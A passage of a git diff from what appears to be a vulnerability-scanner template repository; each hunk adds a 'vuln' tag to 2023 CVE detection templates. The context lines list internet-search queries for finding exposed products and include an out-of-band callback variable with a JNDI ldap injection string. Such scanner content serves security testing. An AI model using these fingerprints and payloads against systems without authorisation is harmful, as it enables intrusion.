variables: string: "CVE-2023-37629" diff --git a/http/cves/2023/CVE-2023-37645.yaml b/http/cves/2023/CVE-2023-37645.yaml index bb6bdd42808..7090fee7394 100644 --- a/http/cves/2023/CVE-2023-37645.yaml +++ b/http/cves/2023/CVE-2023-37645.yaml @@ -28,7 +28,7 @@ info: fofa-query: - icon_hash="-614262549" - title="eyoucms" - tags: cve,cve2023,info-leak,eyoucms + tags: cve,cve2023,info-leak,eyoucms,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 5f49e83114d..0d06d3f9544 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -33,7 +33,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve2023,cve,mflow,lfi,huntr,lfprojects + tags: cve2023,cve,mflow,lfi,huntr,lfprojects,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index f7823cbab4e..c55a48b0d52 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -30,7 +30,7 @@ info: - http.title:"mirth connect administrator" fofa-query: title="mirth connect administrator" google-query: intitle:"mirth connect administrator" - tags: packetstorm,cve2023,cve,nextgen,rce,vkev + tags: packetstorm,cve2023,cve,nextgen,rce,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 4df8dd7b65b..0d0f33bea03 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -32,7 +32,7 @@ info: - title="icewarp" - icon_hash=2144485375 google-query: intitle:"icewarp" - tags: cve,cve2023,icearp,icewarp,xss + tags: cve,cve2023,icearp,icewarp,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index 8069ede0ecb..9297f0fbbfe 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/ninja-forms/ fofa-query: body=/wp-content/plugins/ninja-forms/ publicwww-query: /wp-content/plugins/ninja-forms/ - tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms + tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-37988.yaml b/http/cves/2023/CVE-2023-37988.yaml index 361bbd19c46..ce2bb1a9c44 100644 --- a/http/cves/2023/CVE-2023-37988.yaml +++ b/http/cves/2023/CVE-2023-37988.yaml @@ -25,7 +25,7 @@ info: vendor: creative-solutions product: contact-form-generator fofa-query: body="/wp-content/plugins/contact-form-generator" - tags: cve,cve2023,wordpress,wp,wp-plugin,xss,contact-form-generator,authenticated + tags: cve,cve2023,wordpress,wp,wp-plugin,xss,contact-form-generator,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 315ef2abc6f..26cac41bee4 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -33,7 +33,7 @@ info: - 'html:"Note: Requires a local Sentry administrative user"' - 'http.html:"note: requires a local sentry administrative user"' fofa-query: 'body="note: requires a local sentry administrative user"' - tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast,vkev + tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast,vkev,vuln variables: oast: "{{interactsh-url}}/?" padstr: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-38040.yaml b/http/cves/2023/CVE-2023-38040.yaml index c367ce608c1..47bf5eb277d 100644 --- a/http/cves/2023/CVE-2023-38040.yaml +++ b/http/cves/2023/CVE-2023-38040.yaml @@ -27,7 +27,7 @@ info: fofa-query: icon_hash="106844876" vendor: revive-adserver product: revive_adserver - tags: cve,cve2023,revive-adserver,xss + tags: cve,cve2023,revive-adserver,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-38192.yaml b/http/cves/2023/CVE-2023-38192.yaml index 4694f9103f3..d78e87323d7 100644 --- a/http/cves/2023/CVE-2023-38192.yaml +++ b/http/cves/2023/CVE-2023-38192.yaml @@ -28,7 +28,7 @@ info: vendor: superwebmailer product: superwebmailer shodan-query: title:"SuperWebMailer" - tags: cve,cve2023,superwebmailer,xss,vkev + tags: cve,cve2023,superwebmailer,xss,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-38194.yaml b/http/cves/2023/CVE-2023-38194.yaml index 9f0cb8a4250..191856b7f35 100644 --- a/http/cves/2023/CVE-2023-38194.yaml +++ b/http/cves/2023/CVE-2023-38194.yaml @@ -27,7 +27,7 @@ info: vendor: superwebmailer product: superwebmailer shodan-query: title:"SuperWebMailer" - tags: cve,cve2023,superwebmailer,xss + tags: cve,cve2023,superwebmailer,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index 9c07a31cce5..7fea6d3d3c4 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -36,7 +36,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev,vkev + tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev,vkev,vuln variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/zdfzfd" diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index daf3ade9f1b..649a06b43df 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -38,7 +38,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev,vkev + tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 7d3867f4955..a7d95087a27 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -32,7 +32,7 @@ info: - http.html:"/wpms/asset" fofa-query: body="/wpms/asset" zoomeye-query: app="大华智慧园区综合管理平台" - tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity,vkev + tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity,vkev,vuln variables: random_str: "{{rand_base(6)}}" match_str: "{{md5(random_str)}}" diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index eb02014ae1a..450f88d8589 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: cve2023,cve,xss,unauth,exploitdb,moodating,moosocial + tags: cve2023,cve,xss,unauth,exploitdb,moodating,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 5c675402529..24ca3b993c6 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -31,7 +31,7 @@ info: - '"Server: thttpd/2.25b 29dec2003" content-length:1133' - '"server: thttpd/2.25b 29dec2003" content-length:1133' max-req: 1 - tags: cve2023,cve,fujitsu,ip-series,vkev + tags: cve2023,cve,fujitsu,ip-series,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index 91f7ad7df15..0707429da35 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: cve2023,cve,packetstorm,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index 74bb07b9aa6..3e831db3277 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: cve2023,cve,packetstorm,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml index 2bae344ee79..7132e8d3603 100644 --- a/http/cves/2023/CVE-2023-3846.yaml +++ b/http/cves/2023/CVE-2023-3846.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: cve2023,cve,packetstorm,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 3c5217ac064..69ecbe55918 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: cve2023,cve,packetstorm,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index a2106ee452f..358c727ee5c 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: cve2023,cve,packetstorm,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index 95e36eeba8a..4befe5a79da 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: cve2023,cve,packetstorm,xss,unauth,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,unauth,moodating,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index ebfd6062db4..4ddb136ee1b 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -31,7 +31,7 @@ info: - http.title:"copyparty" fofa-query: title="copyparty" google-query: intitle:"copyparty" - tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project + tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 9077829b48e..6ab7cccdae0 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -37,7 +37,7 @@ info: - title="metabase" - app="metabase" google-query: intitle:"metabase" - tags: cve2023,cve,metabase,oss,rce,vkev + tags: cve2023,cve,metabase,oss,rce,vkev,vuln variables: file: "./plugins/vertica.metabase-driver.jar" diff --git a/http/cves/2023/CVE-2023-38879.yaml b/http/cves/2023/CVE-2023-38879.yaml index 8ae5d810432..353813dd008 100644 --- a/http/cves/2023/CVE-2023-38879.yaml +++ b/http/cves/2023/CVE-2023-38879.yaml @@ -24,7 +24,7 @@ info: product: opensis shodan-query: title:"openSIS" fofa-query: title="openSIS" - tags: cve,cve2023,opensis,lfi + tags: cve,cve2023,opensis,lfi,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-38950.yaml b/http/cves/2023/CVE-2023-38950.yaml index 42ecca93bf4..cc908a8288d 100644 --- a/http/cves/2023/CVE-2023-38950.yaml +++ b/http/cves/2023/CVE-2023-38950.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"biotime" fofa-query: title="biotime" google-query: intitle:"biotime" - tags: cve,cve2023,zkteco,biotime,lfr,kev,vkev + tags: cve,cve2023,zkteco,biotime,lfr,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index b68b6e2d136..0c9b9597714 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -30,7 +30,7 @@ info: fofa-query: - body="Academy LMS" - body="academy lms" - tags: cve2023,cve,academylms,xss,creativeitem + tags: cve2023,cve,academylms,xss,creativeitem,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-38992.yaml b/http/cves/2023/CVE-2023-38992.yaml index 4293beef53d..30515165a89 100644 --- a/http/cves/2023/CVE-2023-38992.yaml +++ b/http/cves/2023/CVE-2023-38992.yaml @@ -27,7 +27,7 @@ info: verified: true shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 - tags: cve,cve2023,jeecg,jeecg-boot,sqli + tags: cve,cve2023,jeecg,jeecg-boot,sqli,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index f366d1a7a7c..fa01604ef3d 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -27,7 +27,7 @@ info: - http.title:"opnsense" fofa-query: title="opnsense" google-query: intitle:"opnsense" - tags: cve2023,cve,opnsense,xss,authenticated,rce + tags: cve2023,cve,opnsense,xss,authenticated,rce,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39007.yaml b/http/cves/2023/CVE-2023-39007.yaml index ed0b7a169f6..c61fb0dd004 100644 --- a/http/cves/2023/CVE-2023-39007.yaml +++ b/http/cves/2023/CVE-2023-39007.yaml @@ -26,7 +26,7 @@ info: - http.title:"opnsense" fofa-query: title="opnsense" google-query: intitle:"opnsense" - tags: cve2023,cve,opnsense,xss,authenticated,rce + tags: cve2023,cve,opnsense,xss,authenticated,rce,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39024.yaml b/http/cves/2023/CVE-2023-39024.yaml index af976d1ba8c..35e87f7106a 100644 --- a/http/cves/2023/CVE-2023-39024.yaml +++ b/http/cves/2023/CVE-2023-39024.yaml @@ -16,7 +16,7 @@ info: vendor: harman product: media-suite fofa-query: "Harman Media Suite" - tags: cve,cve2023,harman,media-suite,lfi + tags: cve,cve2023,harman,media-suite,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 316962410e6..9993b67d82e 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -32,7 +32,7 @@ info: shodan-query: - title:"FileMage" - cpe:"cpe:2.3:o:microsoft:windows" - tags: cve2023,cve,packetstorm,lfi,filemage,microsoft,vkev + tags: cve2023,cve,packetstorm,lfi,filemage,microsoft,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 7bcce4648a7..aca7d2d13b1 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -29,7 +29,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2023,cve,rconfig,authenticated,ssrf,lfr + tags: cve2023,cve,rconfig,authenticated,ssrf,lfr,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 6dc03e930fe..3a030a39ae6 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -29,7 +29,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2023,cve,rconfig,authenticated,ssrf,lfi + tags: cve2023,cve,rconfig,authenticated,ssrf,lfi,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 7742175633b..38f6a195751 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -29,7 +29,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2023,cve,rconfig,authenticated,ssrf,lfr + tags: cve2023,cve,rconfig,authenticated,ssrf,lfr,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml index 38ad1ba0c23..bd3fa84d199 100644 --- a/http/cves/2023/CVE-2023-39120.yaml +++ b/http/cves/2023/CVE-2023-39120.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: title:"OpenWRT" - tags: cve2023,cve,lfi,openwrt,nodogsplash + tags: cve2023,cve,lfi,openwrt,nodogsplash,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index fa62a0556f6..66c4ec36d01 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -34,7 +34,7 @@ info: - http.title:"aria2 webui" fofa-query: title="aria2 webui" google-query: intitle:"aria2 webui" - tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza + tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 5930e685a1b..139a5d4a531 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -36,7 +36,7 @@ info: fofa-query: - body="papercut" - body="content=\"papercut\"" - tags: cve2023,cve,lfi,papercut,vkev + tags: cve2023,cve,lfi,papercut,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 94a38a06bd5..071cb1ee58c 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -27,7 +27,7 @@ info: vendor: adenion product: blog2social framework: wordpress - tags: cve2023,cve,wpscan,wordpress,wp-plugin,xss,authenticated,adenion + tags: cve2023,cve,wpscan,wordpress,wp-plugin,xss,authenticated,adenion,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index bf0a18aa494..17dd769d740 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: time-based-sqli,cve2023,cve,cacti,sqli + tags: time-based-sqli,cve2023,cve,cacti,sqli,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39560.yaml b/http/cves/2023/CVE-2023-39560.yaml index 030c62c8b9e..25ec46c5d52 100644 --- a/http/cves/2023/CVE-2023-39560.yaml +++ b/http/cves/2023/CVE-2023-39560.yaml @@ -23,7 +23,7 @@ info: vendor: ectouch product: ectouch fofa-query: icon_hash="127711143" - tags: cve,cve2023,ectouch,sqli + tags: cve,cve2023,ectouch,sqli,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 0e54e27d0b4..2c7ffbd180a 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -31,7 +31,7 @@ info: - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" - tags: cve2023,cve,xss,icewarp + tags: cve2023,cve,xss,icewarp,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index 31f7c74386a..87e92c45da6 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -33,7 +33,7 @@ info: - title="icewarp" - icon_hash=2144485375 google-query: intitle:"icewarp" - tags: cve,cve2023,icewarp,xss + tags: cve,cve2023,icewarp,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index 3efb0197e25..9601c469a53 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -23,7 +23,7 @@ info: verified: true framework: prestashop shodan-query: html:"/tvcmsblog" - tags: time-based-sqli,cve,cve2023,prestashop,sqli,tvcmsblog + tags: time-based-sqli,cve,cve2023,prestashop,sqli,tvcmsblog,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 17f4b48a727..d211754e52f 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -30,7 +30,7 @@ info: - html:"fieldpopupnewsletter" - http.html:"fieldpopupnewsletter" fofa-query: body="fieldpopupnewsletter" - tags: cve2023,cve,prestashop,xss,fieldthemes + tags: cve2023,cve,prestashop,xss,fieldthemes,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index b82dbd32434..472776f34b7 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -29,7 +29,7 @@ info: shodan-query: - http.component:"PrestaShop" - http.component:"prestashop" - tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project + tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index cc658a4a34a..04c6dfa4062 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -36,7 +36,7 @@ info: - intitle:"icewarp server administration" - intitle:"icewarp" - powered by icewarp 10.4.4 - tags: cve,cve2023,icewarp,xss,unauth + tags: cve,cve2023,icewarp,xss,unauth,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index f598533d2e7..ff0699e1a5a 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: wbce product: wbce_cms - tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive,vkev + tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-3990.yaml b/http/cves/2023/CVE-2023-3990.yaml index 30f37aeeb4b..6ee1b9fb7ce 100644 --- a/http/cves/2023/CVE-2023-3990.yaml +++ b/http/cves/2023/CVE-2023-3990.yaml @@ -27,7 +27,7 @@ info: product: mcms shodan-query: http.favicon.hash:1464851260 fofa-query: icon_hash="1464851260" - tags: cve,cve2023,mingsoft,mcms,xss + tags: cve,cve2023,mingsoft,mcms,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-40000.yaml b/http/cves/2023/CVE-2023-40000.yaml index 331e3bfb889..cf8c3e5fe71 100644 --- a/http/cves/2023/CVE-2023-40000.yaml +++ b/http/cves/2023/CVE-2023-40000.yaml @@ -27,7 +27,7 @@ info: shodan-query: 'vuln:CVE-2023-40000' fofa-query: "wp-content/plugins/litespeed-cache/" google-query: inurl:"/wp-content/plugins/litespeed-cache/" - tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss,intrusive,vkev + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss,intrusive,vkev,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index df1b3bd3b9c..28de682a533 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/stock-ticker/ fofa-query: body=/wp-content/plugins/stock-ticker/ publicwww-query: /wp-content/plugins/stock-ticker/ - tags: cve2023,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic + tags: cve2023,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-40355.yaml b/http/cves/2023/CVE-2023-40355.yaml index 4cbf932c120..438f19578ed 100644 --- a/http/cves/2023/CVE-2023-40355.yaml +++ b/http/cves/2023/CVE-2023-40355.yaml @@ -24,7 +24,7 @@ info: product: axigen_mobile_webmail shodan-query: http.favicon.hash:-1247684400 fofa-query: icon_hash=-1247684400 - tags: cve,cve2023,xss,axigen,webmail + tags: cve,cve2023,xss,axigen,webmail,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-40504.yaml b/http/cves/2023/CVE-2023-40504.yaml index 4da3f690329..e3d22c08e1c 100644 --- a/http/cves/2023/CVE-2023-40504.yaml +++ b/http/cves/2023/CVE-2023-40504.yaml @@ -24,7 +24,7 @@ info: vendor: lg product: simple_editor fofa-query: icon_hash="159985907" - tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload + tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload,vuln variables: filename: "{{rand_base(12)}}" diff --git a/http/cves/2023/CVE-2023-40748.yaml b/http/cves/2023/CVE-2023-40748.yaml index 436fce20e7d..81a053af92d 100644 --- a/http/cves/2023/CVE-2023-40748.yaml +++ b/http/cves/2023/CVE-2023-40748.yaml @@ -23,7 +23,7 @@ info: shodan-query: html:"PHPJabbers" vendor: phpjabbers product: food_delivery_script - tags: cve,cve2023,phpjabbers,food-delivery,sqli + tags: cve,cve2023,phpjabbers,food-delivery,sqli,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-40749.yaml b/http/cves/2023/CVE-2023-40749.yaml index 6ab51ee0598..d99a803e974 100644 --- a/http/cves/2023/CVE-2023-40749.yaml +++ b/http/cves/2023/CVE-2023-40749.yaml @@ -23,7 +23,7 @@ info: shodan-query: html:"PHPJabbers" vendor: phpjabbers product: food_delivery_script - tags: cve,cve2023,phpjabbers,food-delivery,sqli + tags: cve,cve2023,phpjabbers,food-delivery,sqli,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-40750.yaml b/http/cves/2023/CVE-2023-40750.yaml index 87473680a12..06943aa1d1b 100644 --- a/http/cves/2023/CVE-2023-40750.yaml +++ b/http/cves/2023/CVE-2023-40750.yaml @@ -24,7 +24,7 @@ info: fofa-query: body="PHPJabbers" vendor: phpjabbers product: yacht_listing_script - tags: cve,cve2023,phpjabbers,yacht-listing,xss + tags: cve,cve2023,phpjabbers,yacht-listing,xss,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-40751.yaml b/http/cves/2023/CVE-2023-40751.yaml index 141d3ced1c5..57e180346b9 100644 --- a/http/cves/2023/CVE-2023-40751.yaml +++ b/http/cves/2023/CVE-2023-40751.yaml @@ -24,7 +24,7 @@ info: fofa-query: body="PHPJabbers" vendor: phpjabbers product: fundraising_script - tags: cve,cve2023,phpjabbers,fundraising,xss + tags: cve,cve2023,phpjabbers,fundraising,xss,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-40752.yaml b/http/cves/2023/CVE-2023-40752.yaml index fe5a55ab20d..3be47a8b6b1 100644 --- a/http/cves/2023/CVE-2023-40752.yaml +++ b/http/cves/2023/CVE-2023-40752.yaml @@ -24,7 +24,7 @@ info: fofa-query: body="PHPJabbers" vendor: phpjabbers product: make_an_offer_widget - tags: cve,cve2023,phpjabbers,make-an-offer-widget,xss + tags: cve,cve2023,phpjabbers,make-an-offer-widget,xss,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-40753.yaml b/http/cves/2023/CVE-2023-40753.yaml index cec27b195b5..06abc4a7bfe 100644 --- a/http/cves/2023/CVE-2023-40753.yaml +++ b/http/cves/2023/CVE-2023-40753.yaml @@ -24,7 +24,7 @@ info: fofa-query: body="PHPJabbers" vendor: phpjabbers product: ticket_support_script - tags: cve,cve2023,phpjabbers,ticket-support-script,xss,authenticated + tags: cve,cve2023,phpjabbers,ticket-support-script,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-40755.yaml b/http/cves/2023/CVE-2023-40755.yaml index 65c26616b20..6c4657dd7fc 100644 --- a/http/cves/2023/CVE-2023-40755.yaml +++ b/http/cves/2023/CVE-2023-40755.yaml @@ -24,7 +24,7 @@ info: fofa-query: body="PHPJabbers" vendor: phpjabbers product: callback_widget - tags: cve,cve2023,phpjabbers,callback-widget,xss + tags: cve,cve2023,phpjabbers,callback-widget,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index b2a121fd297..89bff9bd295 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -28,7 +28,7 @@ info: - http.title:"icewarp" fofa-query: 